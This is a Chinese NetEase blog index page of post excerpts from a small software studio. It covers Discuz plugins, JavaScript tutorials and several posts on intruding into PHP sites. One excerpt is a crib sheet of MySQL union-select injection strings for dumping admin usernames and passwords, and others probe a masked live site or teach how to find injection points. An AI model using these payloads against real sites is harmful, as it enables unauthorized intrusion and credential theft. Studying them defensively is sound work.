显示下一条  |  关闭

快乐软件工作室

试看将来的环球,必将是Linux的世界!

 
 
 
 
 
 

辽宁省 沈阳市 天秤座

 发消息  写留言

 
linuxer
 
近期心愿我爱的人和爱我的人
交友目的事业伙伴
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 
 
 
 

[置顶] Discuz 多人 悬赏 插件

2012-3-30 15:55:16 阅读10 评论0 302012/03 Mar30

Discuz 多人悬赏
仿CSDN

作者  | 2012-3-30 15:55:16 | 阅读(10) |评论(0) | 阅读全文>>

[置顶] discuz 地图[百度 google] 标注 插件

2012-3-30 15:51:54 阅读7 评论0 302012/03 Mar30

自定义数据显示

实时随机显示标注

标注自己的位置

设置自己的名片

随机显示站内用户名片

自定义名片内容.

作者  | 2012-3-30 15:51:54 | 阅读(7) |评论(0) | 阅读全文>>

[置顶] 快乐软件工作室简介

2008-4-19 20:34:47 阅读394 评论6 192008/04 Apr19

    快乐软件工作室成立于2007年底,由多名具有丰富开发经验的老程序员组成。
    本工作室主要承接软件开发、网站制作、linux系统维护、Linux服务器的搭建等外包项目。可以采用VB、VC、DELPHI、JAVA、RCP、LINUX、GTK+、QT、PHP、ASP、C#、VBA等开发工具,结合Access、MySql、MSSQL、SyBase等数据库开发管理信息系统、地理信息系统等等运行于windows或者Linux平台下的应用软件。
    我们愿以一流的代码,一流的质量,一流的服务结交四方朋友。

作者  | 2008-4-19 20:34:47 | 阅读(394) |评论(6) | 阅读全文>>

JS面向对象

2012-2-2 20:03:09 阅读30 评论0 22012/02 Feb2

JavaScript面向对象的支持
~~~~~~~~~~~~~~~~~~
很少有人对JavaScript的面向对象特性进行系统的分析。我希望接下来的文字让你了解到这
个语言最少为人知的一面。

1. JavaScript中的类型
--------
虽然JavaScript是一个基于对象的语言,但对象(Object)在JavaScript中不是第一型的。JS
是以函数(Function)为第一型的语言。这样说,不但是因为JS中的函数具有高级语言中的函
数的各种特性,而且也因为在JS中,Object也是由函数来实现的。——关于这一点,可以在
后文中“构造与析构”部分看到更进一步的说明。

JS中是弱类型的,他的内置类型简单而且清晰:
---------------------------------------------------------

作者  | 2012-2-2 20:03:09 | 阅读(30) |评论(0) | 阅读全文>>

JS面向对象基础

2012-2-2 19:57:53 阅读20 评论0 22012/02 Feb2

在js中函数就是对象,对象就是函数。
方法直接调用就是函数,用new调用就是对象。
JavaScript 中没有类的语法,是用函数闭包(closure)模拟出来的,下面讲解的时候还是用C#中的类、构造函数的概念,JavaScript中String、 Date等“类”都被叫做“对象”,挺怪,但方便初学者理解,不严谨。JavaScript中声明类(类不是类,是对象)。

Example(写一个Person对象):

function Person() { } //

作者  | 2012-2-2 19:57:53 | 阅读(20) |评论(0) | 阅读全文>>

雾里看花——记一次PHP入侵

2012-1-2 11:27:33 阅读97 评论0 22012/01 Jan2

众所周知,PHP注入难度远远超过ASP注入,加上对这方面研究的人比较少,造成今天众人齐语“难”。其实不是的,一 个PHP网站的安全,取决于很多方面,网站的安全开关的设置是非常重要的。于是,我找到国内一家大型的IT网站(PHP)作为测试,在不了解站点具体情况 的时候,如舞里看花一样慢慢摸索、找寻,为什么找大型网站呢?原因很简单,由于它的功能强大,程序员只要稍微疏忽,就将给他们的网站带来重大的灾难。

 

PHP安全开关
首先介绍一些PHP安全开关的相关知识(以下配置在PHP.INI中)。PHP4.2以后的版本中register_global(全局变量)默认为 OFF,以默认OFF读取变量的方式变成$_GET[“id”],$_POST。magic_quotes_gpc配置 GET/POST/COOKIE 三种模块的特殊字符,包含单引号、双引号

作者  | 2012-1-2 11:27:33 | 阅读(97) |评论(0) | 阅读全文>>

实例讲解PHP入侵

2012-1-2 10:40:57 阅读41 评论0 22012/01 Jan2

PHP入侵是一种黑客比较常用的入侵方式,PHP入侵的操作简单和效果初中是其广为流传的原因。今天我们就通过一次简单的PHP入侵来看一下PHP入侵的全过程,其目的是为了企业安全管理员能够洞悉PHP入侵技术,提高安全防护水平。

测试站点如下

http://www.******.com

找个踩点

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

提交一个 '

返回结果

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

作者  | 2012-1-2 10:40:57 | 阅读(41) |评论(0) | 阅读全文>>

MYSQL注入语句累积

2012-1-2 10:39:52 阅读55 评论0 22012/01 Jan2

/* 确认数据库类型 (只有MYSQL解析/*)
 
 
   and ord(mid(version(),1,1))>51/* 确认数据库版本 51是ASCII码3 正确则>4.0 错误则<4.0
 
 
   union select 1,1,1,****1,1 返回正确 确认字段数
 
   order by 13 返回最后一个正确为字段数
 
  
   union select 1,2,3,4,****11,12,13 from admin 返回正确则admin表名 存在 假设出现数字 2
 
   union select 1,version(),3,*** 13 from admin 暴数据库版本
 
   union select 1,username,3,*** 13 from admin   暴账号/密码

作者  | 2012-1-2 10:39:52 | 阅读(55) |评论(0) | 阅读全文>>

如何入侵php网站

2011-12-25 15:15:16 阅读68 评论0 252011/12 Dec25

第一讲:判断有没注射点
这个很简单,我们最常用的就是看到页面的格式为:index.php?id=2这样的地址,我们知道PHP经常是和MYSQL数据库一起用的,在MYSQL数据库中一定存在一个表,比如setting_table,我们提交上面地址的时候,程序一般上这样处理的:
1、用GET或者POST取我们提交的id=1把这个值传给一个变量id.
2、查询:select * from setting_table where id =$id
上面的语句就是查询的语句,我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的,会取出id为1的信息进行显示给我们,所以我们就能看到正常的页面。

--------------
看我们是怎么判断的:
1、我们提交id=1 and 1=1

作者  | 2011-12-25 15:15:16 | 阅读(68) |评论(0) | 阅读全文>>

JS无缝滚动

2011-12-10 13:09:10 阅读50 评论0 102011/12 Dec10

<script>
// JavaScript Document
/*****
@author leaves chen (leaves615@gmail.com)
@copyright 2009
*****/
var pause=false;
var scrollTimeId=null;
var container=null;
var lineHeight=null;
var speed=0;
var delay=0;
simpleScroll=function(container1,lineHeight1,speed1,delay1){
container=document.getElementById(container1);

作者  | 2011-12-10 13:09:10 | 阅读(50) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2012

   
创建博客 登录  
 关注